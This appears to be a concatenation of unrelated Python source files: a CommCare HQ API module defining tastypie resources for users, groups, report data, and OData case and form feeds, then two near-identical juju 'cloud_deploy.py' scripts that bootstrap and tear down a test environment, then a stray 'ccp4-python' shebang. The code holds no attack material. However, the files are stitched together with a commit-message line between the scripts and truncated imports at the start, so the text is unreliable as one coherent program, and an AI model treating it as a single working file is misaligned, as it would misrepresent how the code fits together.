from corehq.apps.locations.permissions import location_safe
from corehq.apps.reports.analytics.esaccessors import (
get_case_types_for_domain_es,
)
from corehq.apps.reports.standard.cases.utils import (
query_location_restricted_cases,
query_location_restricted_forms,
)
from corehq.apps.userreports.columns import UCRExpandDatabaseSubcolumn
from corehq.apps.userreports.dbaccessors import get_datasources_for_domain
from corehq.apps.userreports.exceptions import BadSpecError
from corehq.apps.userreports.models import (
DataSourceConfiguration,
ReportConfiguration,
StaticReportConfiguration,
report_config_id_is_static,
)
from corehq.apps.userreports.reports.data_source import (
ConfigurableReportDataSource,
)
from corehq.apps.userreports.reports.view import (
get_filter_values,
query_dict_to_dict,
)
from corehq.apps.userreports.util import (
get_configurable_and_static_reports,
get_report_config_or_not_found,
)
from corehq.apps.users.dbaccessors import (
get_all_user_id_username_pairs_by_domain,
)
from corehq.apps.users.models import (
CommCareUser,
CouchUser,
Permissions,
UserRole,
WebUser,
)
from corehq.apps.users.util import raw_username
from corehq.const import USER_CHANGE_VIA_API
from corehq.util import get_document_or_404
from corehq.util.couch import DocumentNotFound
from corehq.util.timer import TimingContext
from . import (
CorsResourceMixin,
CouchResourceMixin,
DomainSpecificResourceMixin,
HqBaseResource,
v0_1,
v0_4,
)
from .pagination import DoesNothingPaginator, NoCountingPaginator
from ..exceptions import InvalidFormatException, InvalidFieldException, UpdateConflictException
from ..user_updates import update
MOCK_BULK_USER_ES = None
def user_es_call(domain, q, fields, size, start_at):
query = (UserES()
.domain(domain)
.fields(fields)
.size(size)
.start(start_at))
if q is not None:
query.set_query({"query_string": {"query": q}})
return query.run().hits
def _set_role_for_bundle(kwargs, bundle):
# check for roles associated with the domain
domain_roles = UserRole.objects.by_domain_and_name(kwargs['domain'], bundle.data.get('role'))
if domain_roles:
qualified_role_id = domain_roles[0].get_qualified_id() # roles may not be unique by name
bundle.obj.set_role(kwargs['domain'], qualified_role_id)
else:
raise BadRequest(f"Invalid User Role '{bundle.data.get('role')}'")
class BulkUserResource(HqBaseResource, DomainSpecificResourceMixin):
"""
A read-only user data resource based on elasticsearch.
Supported Params: limit offset q fields
"""
type = "bulk-user"
id = fields.CharField(attribute='id', readonly=True, unique=True)
email = fields.CharField(attribute='email')
username = fields.CharField(attribute='username', unique=True)
first_name = fields.CharField(attribute='first_name', null=True)
last_name = fields.CharField(attribute='last_name', null=True)
phone_numbers = fields.ListField(attribute='phone_numbers', null=True)
@staticmethod
def to_obj(user):
'''
Takes a flat dict and returns an object
'''
if '_id' in user:
user['id'] = user.pop('_id')
return namedtuple('user', list(user))(**user)
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.edit_commcare_users)
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
object_class = object
resource_name = 'bulk-user'
def dehydrate(self, bundle):
fields = bundle.request.GET.getlist('fields')
data = {}
if not fields:
return bundle
for field in fields:
data[field] = bundle.data[field]
bundle.data = data
return bundle
def obj_get_list(self, bundle, **kwargs):
request_fields = bundle.request.GET.getlist('fields')
for field in request_fields:
if field not in self.fields:
raise BadRequest('{0} is not a valid field'.format(field))
params = bundle.request.GET
param = lambda p: params.get(p, None)
fields = list(self.fields)
fields.remove('id')
fields.append('_id')
fn = MOCK_BULK_USER_ES or user_es_call
users = fn(
domain=kwargs['domain'],
q=param('q'),
fields=fields,
size=param('limit'),
start_at=param('offset'),
)
return list(map(self.to_obj, users))
def detail_uri_kwargs(self, bundle_or_obj):
return {
'pk': get_obj(bundle_or_obj).id
}
class CommCareUserResource(v0_1.CommCareUserResource):
class Meta(v0_1.CommCareUserResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict) and request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if bundle_or_obj is None:
return super(CommCareUserResource, self).get_resource_uri(bundle_or_obj, url_name)
elif isinstance(bundle_or_obj, Bundle):
obj = bundle_or_obj.obj
else:
obj = bundle_or_obj
return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
domain=obj.domain,
api_name=self._meta.api_name,
pk=obj._id))
def obj_create(self, bundle, **kwargs):
try:
bundle.obj = CommCareUser.create(
domain=kwargs['domain'],
username=bundle.data['username'].lower(),
password=bundle.data['password'],
created_by=bundle.request.couch_user,
created_via=USER_CHANGE_VIA_API,
email=bundle.data.get('email', '').lower(),
)
# password was just set
bundle.data.pop('password', None)
# do not call update with username key
bundle.data.pop('username', None)
self._update(bundle)
bundle.obj.save()
except Exception:
if bundle.obj._id:
bundle.obj.retire(bundle.request.domain, deleted_by=bundle.request.couch_user,
deleted_via=USER_CHANGE_VIA_API)
try:
django_user = bundle.obj.get_django_user()
except User.DoesNotExist:
pass
else:
django_user.delete()
raise
return bundle
def obj_update(self, bundle, **kwargs):
bundle.obj = CommCareUser.get(kwargs['pk'])
assert bundle.obj.domain == kwargs['domain']
user_change_logger = self._get_user_change_logger(bundle)
errors = self._update(bundle, user_change_logger)
if errors:
formatted_errors = ', '.join(errors)
raise BadRequest(_('The request resulted in the following errors: {}').format(formatted_errors))
assert bundle.obj.domain == kwargs['domain']
bundle.obj.save()
user_change_logger.save()
return bundle
def obj_delete(self, bundle, **kwargs):
user = CommCareUser.get(kwargs['pk'])
if user:
user.retire(bundle.request.domain, deleted_by=bundle.request.couch_user,
deleted_via=USER_CHANGE_VIA_API)
return ImmediateHttpResponse(response=http.HttpAccepted())
@classmethod
def _update(cls, bundle, user_change_logger=None):
errors = []
for key, value in bundle.data.items():
try:
update(bundle.obj, key, value, user_change_logger)
except InvalidFieldException as e:
errors.append(_("Attempted to update unknown or non-editable field '{}'").format(e.field))
except InvalidFormatException as e:
errors.append(_('{} must be a {}').format(e.field, e.expected_type))
except (UpdateConflictException, ValidationError) as e:
errors.append(e.message)
return errors
class WebUserResource(v0_1.WebUserResource):
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if isinstance(bundle_or_obj, Bundle):
domain = bundle_or_obj.request.domain
obj = bundle_or_obj.obj
elif bundle_or_obj is None:
return None
return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
domain=domain,
api_name=self._meta.api_name,
pk=obj._id))
class AdminWebUserResource(v0_1.UserResource):
domains = fields.ListField(attribute='domains')
def obj_get(self, bundle, **kwargs):
return WebUser.get(kwargs['pk'])
def obj_get_list(self, bundle, **kwargs):
if 'username' in bundle.request.GET:
return [WebUser.get_by_username(bundle.request.GET['username'])]
return [WebUser.wrap(u) for u in UserES().web_users().run().hits]
class Meta(WebUserResource.Meta):
authentication = AdminAuthentication()
detail_allowed_methods = ['get']
list_allowed_methods = ['get']
class GroupResource(v0_4.GroupResource):
class Meta(v0_4.GroupResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post', 'patch']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict):
if 'error_message' in data.data:
data = {'error_message': data.data['error_message']}
elif request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def patch_list(self, request=None, **kwargs):
"""
Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1466
(BSD licensed) and modified to pass the kwargs to `obj_create` and support only create method
"""
request = convert_post_to_patch(request)
deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
collection_name = self._meta.collection_name
if collection_name not in deserialized:
raise BadRequest("Invalid data sent: missing '%s'" % collection_name)
if len(deserialized[collection_name]) and 'put' not in self._meta.detail_allowed_methods:
raise ImmediateHttpResponse(response=http.HttpMethodNotAllowed())
bundles_seen = []
status = http.HttpAccepted
for data in deserialized[collection_name]:
data = self.alter_deserialized_detail_data(request, data)
bundle = self.build_bundle(data=dict_strip_unicode_keys(data), request=request)
try:
self.obj_create(bundle=bundle, **self.remove_api_resource_names(kwargs))
except AssertionError as e:
status = http.HttpBadRequest
bundle.data['_id'] = str(e)
bundles_seen.append(bundle)
to_be_serialized = [bundle.data['_id'] for bundle in bundles_seen]
return self.create_response(request, to_be_serialized, response_class=status)
def post_list(self, request, **kwargs):
"""
Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1314
(BSD licensed) and modified to catch Exception and not returning traceback
"""
deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
deserialized = self.alter_deserialized_detail_data(request, deserialized)
bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized), request=request)
try:
updated_bundle = self.obj_create(bundle, **self.remove_api_resource_names(kwargs))
location = self.get_resource_uri(updated_bundle)
if not self._meta.always_return_data:
return http.HttpCreated(location=location)
else:
updated_bundle = self.full_dehydrate(updated_bundle)
updated_bundle = self.alter_detail_data_to_serialize(request, updated_bundle)
return self.create_response(request, updated_bundle, response_class=http.HttpCreated, location=location)
except AssertionError as e:
bundle.data['error_message'] = str(e)
return self.create_response(request, bundle, response_class=http.HttpBadRequest)
def _update(self, bundle):
should_save = False
for key, value in bundle.data.items():
if key == 'name' and getattr(bundle.obj, key, None) != value:
if not Group.by_name(bundle.obj.domain, value):
setattr(bundle.obj, key, value or '')
should_save = True
else:
raise Exception("A group with this name already exists")
if key == 'users' and getattr(bundle.obj, key, None) != value:
users_to_add = set(value) - set(bundle.obj.users)
users_to_remove = set(bundle.obj.users) - set(value)
for user in users_to_add:
bundle.obj.add_user(user)
should_save = True
for user in users_to_remove:
bundle.obj.remove_user(user)
should_save = True
elif getattr(bundle.obj, key, None) != value:
setattr(bundle.obj, key, value)
should_save = True
return should_save
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if bundle_or_obj is None:
return super(GroupResource, self).get_resource_uri(bundle_or_obj, url_name)
elif isinstance(bundle_or_obj, Bundle):
obj = bundle_or_obj.obj
else:
obj = bundle_or_obj
return self._get_resource_uri(obj)
def _get_resource_uri(self, obj):
# This function is called up to 1000 times per request
# so build url from a known string template
# to avoid calling the expensive `reverse` function each time
return self._get_resource_uri_template.format(domain=obj.domain, pk=obj._id)
@memoized_property
def _get_resource_uri_template(self):
"""Returns the literal string "/a/{domain}/api/v0.5/group/{pk}/" in a DRY way"""
return reverse('api_dispatch_detail', kwargs=dict(
resource_name=self._meta.resource_name,
api_name=self._meta.api_name,
domain='__domain__',
pk='__pk__')).replace('__pk__', '{pk}').replace('__domain__', '{domain}')
def obj_create(self, bundle, request=None, **kwargs):
if not Group.by_name(kwargs['domain'], bundle.data.get("name")):
bundle.obj = Group(bundle.data)
bundle.obj.name = bundle.obj.name or ''
bundle.obj.domain = kwargs['domain']
bundle.obj.save()
for user in bundle.obj.users:
CommCareUser.get(user).set_groups([bundle.obj._id])
else:
raise AssertionError("A group with name %s already exists" % bundle.data.get("name"))
return bundle
def obj_update(self, bundle, **kwargs):
bundle.obj = Group.get(kwargs['pk'])
assert bundle.obj.domain == kwargs['domain']
if self._update(bundle):
assert bundle.obj.domain == kwargs['domain']
bundle.obj.save()
return bundle
def obj_delete(self, bundle, **kwargs):
group = self.obj_get(bundle, **kwargs)
group.soft_delete()
return bundle
class DomainAuthorization(ReadOnlyAuthorization):
def __init__(self, domain_key='domain', *args, **kwargs):
self.domain_key = domain_key
def read_list(self, object_list, bundle):
return object_list.filter(**{self.domain_key: bundle.request.domain})
class DeviceReportResource(HqBaseResource, ModelResource):
class Meta(object):
queryset = DeviceReportEntry.objects.all()
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'device-log'
authentication = RequirePermissionAuthentication(Permissions.edit_data)
authorization = DomainAuthorization()
paginator_class = NoCountingPaginator
filtering = {
# this is needed for the domain filtering but any values passed in via the URL get overridden
"domain": ('exact',),
"date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
"user_id": ('exact',),
"username": ('exact',),
"type": ('exact',),
"xform_id": ('exact',),
"device_id": ('exact',),
}
ConfigurableReportData = namedtuple("ConfigurableReportData", [
"data", "columns", "id", "domain", "total_records", "get_params", "next_page"
])
class ConfigurableReportDataResource(HqBaseResource, DomainSpecificResourceMixin):
"""
A resource that replicates the behavior of the ajax part of the
ConfigurableReportView view.
"""
data = fields.ListField(attribute="data", readonly=True)
columns = fields.ListField(attribute="columns", readonly=True)
total_records = fields.IntegerField(attribute="total_records", readonly=True)
next_page = fields.CharField(attribute="next_page", readonly=True)
LIMIT_DEFAULT = 50
LIMIT_MAX = 50
def _get_start_param(self, bundle):
try:
start = int(bundle.request.GET.get('offset', 0))
if start < 0:
raise ValueError
except (ValueError, TypeError):
raise BadRequest("start must be a positive integer.")
return start
def _get_limit_param(self, bundle):
try:
limit = int(bundle.request.GET.get('limit', self.LIMIT_DEFAULT))
if limit < 0:
raise ValueError
except (ValueError, TypeError):
raise BadRequest("limit must be a positive integer.")
if limit > self.LIMIT_MAX:
raise BadRequest("Limit may not exceed {}.".format(self.LIMIT_MAX))
return limit
def _get_next_page(self, domain, id_, start, limit, total_records, get_query_dict):
if total_records > start + limit:
start += limit
new_get_params = get_query_dict.copy()
new_get_params["offset"] = start
# limit has not changed, but it may not have been present in get params before.
new_get_params["limit"] = limit
return reverse('api_dispatch_detail', kwargs=dict(
api_name=self._meta.api_name,
resource_name=self._meta.resource_name,
domain=domain,
pk=id_,
)) + "?" + new_get_params.urlencode()
else:
return ""
def _get_report_data(self, report_config, domain, start, limit, get_params, couch_user):
report = ConfigurableReportDataSource.from_spec(report_config, include_prefilters=True)
string_type_params = [
filter.name
for filter in report_config.ui_filters
if getattr(filter, 'datatype', 'string') == "string"
]
filter_values = get_filter_values(
report_config.ui_filters,
query_dict_to_dict(get_params, domain, string_type_params),
couch_user,
)
report.set_filter_values(filter_values)
page = list(report.get_data(start=start, limit=limit))
columns = []
for column in report.columns:
simple_column = {
"header": column.header,
"slug": column.slug,
}
if isinstance(column, UCRExpandDatabaseSubcolumn):
simple_column['expand_column_value'] = column.expand_value
columns.append(simple_column)
total_records = report.get_total_records()
return page, columns, total_records
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
pk = kwargs['pk']
start = self._get_start_param(bundle)
limit = self._get_limit_param(bundle)
report_config = self._get_report_configuration(pk, domain)
page, columns, total_records = self._get_report_data(
report_config, domain, start, limit, bundle.request.GET, bundle.request.couch_user)
return ConfigurableReportData(
data=page,
columns=columns,
total_records=total_records,
id=report_config._id,
domain=domain,
get_params=bundle.request.GET,
next_page=self._get_next_page(
domain,
report_config._id,
start,
limit,
total_records,
bundle.request.GET,
)
)
def _get_report_configuration(self, id_, domain):
"""
Fetch the required ReportConfiguration object
:param id_: The id of the ReportConfiguration
:param domain: The domain of the ReportConfiguration
:return: A ReportConfiguration
"""
try:
if report_config_id_is_static(id_):
return StaticReportConfiguration.by_id(id_, domain=domain)
else:
return get_report_config_or_not_found(domain, id_)
except DocumentNotFound:
raise NotFound
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj).id,
}
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
uri = super(ConfigurableReportDataResource, self).get_resource_uri(bundle_or_obj, url_name)
if bundle_or_obj is not None and uri:
get_params = get_obj(bundle_or_obj).get_params.copy()
if "offset" not in get_params:
get_params["offset"] = 0
if "limit" not in get_params:
get_params["limit"] = self.LIMIT_DEFAULT
uri += "?{}".format(get_params.urlencode())
return uri
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.view_reports, allow_session_auth=True)
list_allowed_methods = []
detail_allowed_methods = ["get"]
class SimpleReportConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
id = fields.CharField(attribute='get_id', readonly=True, unique=True)
title = fields.CharField(readonly=True, attribute="title", null=True)
filters = fields.ListField(readonly=True)
columns = fields.ListField(readonly=True)
def dehydrate_filters(self, bundle):
obj_filters = bundle.obj.filters
return [{
"type": f["type"],
"datatype": f["datatype"],
"slug": f["slug"]
} for f in obj_filters]
def dehydrate_columns(self, bundle):
obj_columns = bundle.obj.columns
return [{
"column_id": c['column_id'],
"display": c['display'],
"type": c["type"],
} for c in obj_columns]
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
pk = kwargs['pk']
try:
report_configuration = get_document_or_404(ReportConfiguration, domain, pk)
except Http404 as e:
raise NotFound(str(e))
return report_configuration
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
return get_configurable_and_static_reports(domain)
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj)._id,
}
class Meta(CustomResourceMeta):
list_allowed_methods = ["get"]
detail_allowed_methods = ["get"]
paginator_class = DoesNothingPaginator
class DataSourceConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
"""
API resource for DataSourceConfigurations (UCR data sources)
"""
id = fields.CharField(attribute='get_id', readonly=True, unique=True)
display_name = fields.CharField(attribute="display_name", null=True)
configured_filter = fields.DictField(attribute="configured_filter", use_in='detail')
configured_indicators = fields.ListField(attribute="configured_indicators", use_in='detail')
def _ensure_toggle_enabled(self, request):
if not toggles.USER_CONFIGURABLE_REPORTS.enabled_for_request(request):
raise ImmediateHttpResponse(
add_cors_headers_to_response(
HttpResponse(
json.dumps({"error": _("You don't have permission to access this API")}),
content_type="application/json",
status=401,
)
)
)
def obj_get(self, bundle, **kwargs):
self._ensure_toggle_enabled(bundle.request)
domain = kwargs['domain']
pk = kwargs['pk']
try:
data_source = get_document_or_404(DataSourceConfiguration, domain, pk)
except Http404 as e:
raise NotFound(str(e))
return data_source
def obj_get_list(self, bundle, **kwargs):
self._ensure_toggle_enabled(bundle.request)
domain = kwargs['domain']
return get_datasources_for_domain(domain)
def obj_update(self, bundle, **kwargs):
self._ensure_toggle_enabled(bundle.request)
domain = kwargs['domain']
pk = kwargs['pk']
try:
data_source = get_document_or_404(DataSourceConfiguration, domain, pk)
except Http404 as e:
raise NotFound(str(e))
allowed_update_fields = [
'display_name',
'configured_filter',
'configured_indicators',
]
for key, value in bundle.data.items():
if key in allowed_update_fields:
data_source[key] = value
try:
data_source.validate()
data_source.save()
except BadSpecError as e:
raise ImmediateHttpResponse(
add_cors_headers_to_response(
HttpResponse(
json.dumps({"error": _("Invalid data source! Details: {details}").format(details=str(e))}),
content_type="application/json",
status=500,
)
)
)
bundle.obj = data_source
return bundle
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj)._id,
}
class Meta(CustomResourceMeta):
resource_name = 'ucr_data_source'
list_allowed_methods = ['get']
detail_allowed_methods = ['get', 'put']
always_return_data = True
paginator_class = DoesNothingPaginator
authentication = RequirePermissionAuthentication(Permissions.edit_ucrs)
UserDomain = namedtuple('UserDomain', 'domain_name project_name')
UserDomain.__new__.__defaults__ = ('', '')
class UserDomainsResource(CorsResourceMixin, Resource):
domain_name = fields.CharField(attribute='domain_name')
project_name = fields.CharField(attribute='project_name')
class Meta(object):
resource_name = 'user_domains'
authentication = LoginAuthentication(allow_session_auth=True)
object_class = UserDomain
include_resource_uri = False
def dispatch_list(self, request, **kwargs):
try:
return super(UserDomainsResource, self).dispatch_list(request, **kwargs)
except ImmediateHttpResponse as immediate_http_response:
if isinstance(immediate_http_response.response, HttpUnauthorized):
raise ImmediateHttpResponse(
response=HttpUnauthorized(
content='Username or API Key is incorrect', content_type='text/plain'
)
)
else:
raise
def obj_get_list(self, bundle, **kwargs):
feature_flag = bundle.request.GET.get("feature_flag")
if feature_flag and feature_flag not in toggles.all_toggles_slug():
raise BadRequest(f"{feature_flag!r} is not a valid feature flag")
return self.get_object_list(bundle.request, feature_flag)
def get_object_list(self, request, feature_flag=None):
couch_user = CouchUser.from_django_user(request.user)
results = []
for domain in couch_user.get_domains():
if not domain_has_privilege(domain, privileges.ZAPIER_INTEGRATION):
continue
domain_object = Domain.get_by_name(domain)
if feature_flag and feature_flag not in toggles.toggles_dict(domain=domain):
continue
results.append(UserDomain(
domain_name=domain_object.name,
project_name=domain_object.hr_name or domain_object.name
))
return results
class IdentityResource(CorsResourceMixin, Resource):
id = fields.CharField(attribute='get_id', readonly=True)
username = fields.CharField(attribute='username', readonly=True)
first_name = fields.CharField(attribute='first_name', readonly=True)
last_name = fields.CharField(attribute='last_name', readonly=True)
email = fields.CharField(attribute='email', readonly=True)
def obj_get_list(self, bundle, **kwargs):
return [bundle.request.couch_user]
class Meta(object):
resource_name = 'identity'
authentication = LoginAuthentication()
serializer = ListToSingleObjectSerializer()
detail_allowed_methods = []
list_allowed_methods = ['get']
object_class = CouchUser
include_resource_uri = False
Form = namedtuple('Form', 'form_xmlns form_name')
Form.__new__.__defaults__ = ('', '')
class DomainForms(Resource):
"""
Returns: list of forms for a given domain with form name formatted for display in Zapier
"""
form_xmlns = fields.CharField(attribute='form_xmlns')
form_name = fields.CharField(attribute='form_name')
class Meta(object):
resource_name = 'domain_forms'
authentication = RequirePermissionAuthentication(Permissions.access_api)
object_class = Form
include_resource_uri = False
allowed_methods = ['get']
limit = 200
max_limit = 1000
def obj_get_list(self, bundle, **kwargs):
application_id = bundle.request.GET.get('application_id')
if not application_id:
raise NotFound('application_id parameter required')
results = []
application = Application.get(docid=application_id)
if not application:
return []
forms_objects = application.get_forms(bare=False)
for form_object in forms_objects:
form = form_object['form']
module = form_object['module']
form_name = '{} > {} > {}'.format(application.name, module.default_name(), form.default_name())
results.append(Form(form_xmlns=form.xmlns, form_name=form_name))
return results
# Zapier requires id and name; case_type has no obvious id, placeholder inserted instead.
CaseType = namedtuple('CaseType', 'case_type placeholder')
CaseType.__new__.__defaults__ = ('', '')
class DomainCases(Resource):
"""
Returns: list of case types for a domain
Note: only returns case types for which at least one case has been made
"""
placeholder = fields.CharField(attribute='placeholder')
case_type = fields.CharField(attribute='case_type')
class Meta(object):
resource_name = 'domain_cases'
authentication = RequirePermissionAuthentication(Permissions.access_api)
object_class = CaseType
include_resource_uri = False
allowed_methods = ['get']
limit = 100
max_limit = 1000
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
case_types = get_case_types_for_domain_es(domain)
results = [CaseType(case_type=case_type) for case_type in case_types]
return results
UserInfo = namedtuple('UserInfo', 'user_id user_name')
UserInfo.__new__.__defaults__ = ('', '')
class DomainUsernames(Resource):
"""
Returns: list of usernames for a domain.
"""
user_id = fields.CharField(attribute='user_id')
user_name = fields.CharField(attribute='user_name')
class Meta(object):
resource_name = 'domain_usernames'
authentication = RequirePermissionAuthentication(Permissions.view_commcare_users)
object_class = User
include_resource_uri = False
allowed_methods = ['get']
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
user_ids_username_pairs = get_all_user_id_username_pairs_by_domain(domain)
results = [UserInfo(user_id=user_pair[0], user_name=raw_username(user_pair[1]))
for user_pair in user_ids_username_pairs]
return results
class BaseODataResource(HqBaseResource, DomainSpecificResourceMixin):
config_id = None
table_id = None
def dispatch(self, request_type, request, **kwargs):
if not domain_has_privilege(request.domain, privileges.ODATA_FEED):
raise ImmediateHttpResponse(
response=HttpResponseNotFound('Feature flag not enabled.')
)
self.config_id = kwargs['config_id']
self.table_id = int(kwargs.get('table_id', 0))
with TimingContext() as timer:
response = super(BaseODataResource, self).dispatch(
request_type, request, **kwargs
)
record_feed_access_in_datadog(request, self.config_id, timer.duration, response)
return response
def create_response(self, request, data, response_class=HttpResponse,
**response_kwargs):
data['domain'] = request.domain
data['config_id'] = self.config_id
data['api_path'] = request.path
data['table_id'] = self.table_id
response = super(BaseODataResource, self).create_response(
request, data, response_class, **response_kwargs)
return add_odata_headers(response)
def detail_uri_kwargs(self, bundle_or_obj):
# Not sure why this is required but the feed 500s without it
return {
'pk': get_obj(bundle_or_obj)['_id']
}
def determine_format(self, request):
# Results should be sent as JSON
return 'application/json'
@location_safe
class ODataCaseResource(BaseODataResource):
def obj_get_list(self, bundle, domain, **kwargs):
config = get_document_or_404(CaseExportInstance, domain, self.config_id)
if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
raise ImmediateHttpResponse(
HttpForbidden(gettext_noop(
"You do not have permission to view this feed."
))
)
query = get_case_export_base_query(domain, config.case_type)
for filter in config.get_filters():
query = query.filter(filter.to_es_filter())
if not bundle.request.couch_user.has_permission(
domain, 'access_all_locations'
):
query = query_location_restricted_cases(query, bundle.request)
return query
class Meta(v0_4.CommCareCaseResource.Meta):
authentication = ODataAuthentication()
resource_name = 'odata/cases'
serializer = ODataCaseSerializer()
limit = 2000
max_limit = 10000
def prepend_urls(self):
return [
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
]
@location_safe
class ODataFormResource(BaseODataResource):
def obj_get_list(self, bundle, domain, **kwargs):
config = get_document_or_404(FormExportInstance, domain, self.config_id)
if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
raise ImmediateHttpResponse(
HttpForbidden(gettext_noop(
"You do not have permission to view this feed."
))
)
query = get_form_export_base_query(domain, config.app_id, config.xmlns, include_errors=False)
for filter in config.get_filters():
query = query.filter(filter.to_es_filter())
if not bundle.request.couch_user.has_permission(
domain, 'access_all_locations'
):
query = query_location_restricted_forms(query, bundle.request)
return query
class Meta(v0_4.XFormInstanceResource.Meta):
authentication = ODataAuthentication()
resource_name = 'odata/forms'
serializer = ODataFormSerializer()
limit = 2000
max_limit = 10000
def prepend_urls(self):
return [
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
]
|
#!/usr/bin/env python
from __future__ import print_function
__metaclass__ = type
from argparse import ArgumentParser
import os
import subprocess
import sys
from time import sleep
from jujupy import (
CannotConnectEnv,
Environment,
start_libvirt_domain,
stop_libvirt_domain,
verify_libvirt_domain_running,
)
def deploy_stack(environment, debug, machines):
""""Deploy a test stack in the specified environment.
:param environment: The name of the desired environment.
"""
env = Environment.from_config(environment)
env.client.debug = debug
running_domains = dict()
if env.config['type'] == 'maas':
# Split the hypervisor_URI and machine name
for machine in machines:
name, URI = machine.split('@')
# Record already running domains, so they can be left running,
# if already running; otherwise start them.
if verify_libvirt_domain_running(URI, name):
running_domains = {machine: True}
else:
running_domains = {machine: False}
print("Attempting to start %s at %s" % (name, URI))
status_msg = start_libvirt_domain(URI, name)
print("%s" % status_msg)
# Clean up any leftover junk
env.destroy_environment()
env.bootstrap()
try:
# wait for status info....
try:
try:
env.get_status()
except CannotConnectEnv:
print("Status got Unable to connect to env. Retrying...")
env.get_status()
env.wait_for_started()
except subprocess.CalledProcessError as e:
if getattr(e, 'stderr', None) is not None:
sys.stderr.write(e.stderr)
raise
finally:
env.destroy_environment()
if env.config['type'] == 'maas':
sleep(90)
for machine, running in running_domains.items():
if not running:
name, URI = machine.split('@')
status_msg = stop_libvirt_domain(URI, name)
print("%s" % status_msg)
def main():
parser = ArgumentParser('Test a cloud')
parser.add_argument('env', help='The juju environment to test')
parser.add_argument('--machine', help='KVM machine to start.',
action='append', default=[])
args = parser.parse_args()
debug = bool(os.environ.get('DEBUG') == 'true')
try:
deploy_stack(args.env, debug, args.machine)
except Exception as e:
print('%s: %s' % (type(e), e))
sys.exit(1)
if __name__ == '__main__':
main()
cloud_deploy.py: Deploy dummy-source and dummy-sink.
#!/usr/bin/env python
from __future__ import print_function
__metaclass__ = type
from argparse import ArgumentParser
import os
import subprocess
import sys
from time import sleep
from deploy_stack import deploy_dummy_stack
from jujupy import (
CannotConnectEnv,
Environment,
start_libvirt_domain,
stop_libvirt_domain,
verify_libvirt_domain_running,
)
def deploy_stack(environment, debug, machines):
""""Deploy a test stack in the specified environment.
:param environment: The name of the desired environment.
"""
env = Environment.from_config(environment)
env.client.debug = debug
running_domains = dict()
if env.config['type'] == 'maas':
# Split the hypervisor_URI and machine name
for machine in machines:
name, URI = machine.split('@')
# Record already running domains, so they can be left running,
# if already running; otherwise start them.
if verify_libvirt_domain_running(URI, name):
running_domains = {machine: True}
else:
running_domains = {machine: False}
print("Attempting to start %s at %s" % (name, URI))
status_msg = start_libvirt_domain(URI, name)
print("%s" % status_msg)
# Clean up any leftover junk
env.destroy_environment()
env.bootstrap()
try:
# wait for status info....
try:
try:
env.get_status()
except CannotConnectEnv:
print("Status got Unable to connect to env. Retrying...")
env.get_status()
env.wait_for_started()
deploy_dummy_stack(
env, 'local:{}/'.format(env.config.get(
'default-series', 'precise')))
except subprocess.CalledProcessError as e:
if getattr(e, 'stderr', None) is not None:
sys.stderr.write(e.stderr)
raise
finally:
env.destroy_environment()
if env.config['type'] == 'maas':
sleep(90)
for machine, running in running_domains.items():
if not running:
name, URI = machine.split('@')
status_msg = stop_libvirt_domain(URI, name)
print("%s" % status_msg)
def main():
parser = ArgumentParser('Test a cloud')
parser.add_argument('env', help='The juju environment to test')
parser.add_argument('--machine', help='KVM machine to start.',
action='append', default=[])
args = parser.parse_args()
debug = bool(os.environ.get('DEBUG') == 'true')
try:
deploy_stack(args.env, debug, args.machine)
except Exception as e:
print('%s: %s' % (type(e), e))
sys.exit(1)
if __name__ == '__main__':
main()
|
#!/usr/bin/env ccp4-python
